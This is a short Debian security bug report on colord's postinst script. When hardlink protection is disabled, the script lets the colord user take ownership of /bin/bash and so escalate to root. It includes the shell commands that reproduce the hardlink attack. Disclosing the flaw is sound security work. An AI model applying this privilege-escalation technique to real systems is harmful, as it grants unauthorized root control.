Package: colord Version: 1.3.3-2 Severity: important Tags: security On systems with fs.protected_hardlinks=0 the postinst script allows escalation from the colord user to root:
+--- | # sysctl fs.protected_hardlinks=0 | # runuser -u colord ln /bin/bash /var/lib/colord/bash | # ls -l /bin/bash | -rwxr-xr-x 2 root root 1099016 May 15 2017 /bin/bash | # dpkg-reconfigure colord | # ls -l /bin/bash | -rwxr-xr-x 2 colord colord 1099016 May 15 2017 /bin/bash +--- This is essentially the same problem as CVE-2017-18078. Ansgar (now hoping every other `chmod -R` call gets a CVE assigned)
